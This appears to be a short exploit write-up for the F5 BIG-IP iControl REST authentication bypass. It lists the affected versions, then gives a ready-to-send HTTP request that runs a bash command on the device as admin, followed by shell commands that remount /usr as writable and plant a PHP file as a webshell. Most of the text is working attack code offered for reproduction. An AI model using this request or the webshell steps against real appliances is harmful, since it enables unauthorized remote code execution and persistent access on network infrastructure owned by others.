Vulnerability Description#
Vulnerability Description:
In versions prior to F5 BIG-IP 16.1.x 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, as well as all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Unassessed software versions that have reached End of Technical Support (EoTS).
Reproduction Process#
The HTTP request package is as follows:
POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}
EXP/POC#
Webshell Writing#
Shell obtained by rebounding.
Webshell writing can refer to another vulnerability F5 BIG-IP CVE-2020-5902
The path for writing is: /usr/local/www
mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
Access path:
Reference#
F5 BIG-IP Remote Code Execution Vulnerability Reproduction (CVE-2020-5902)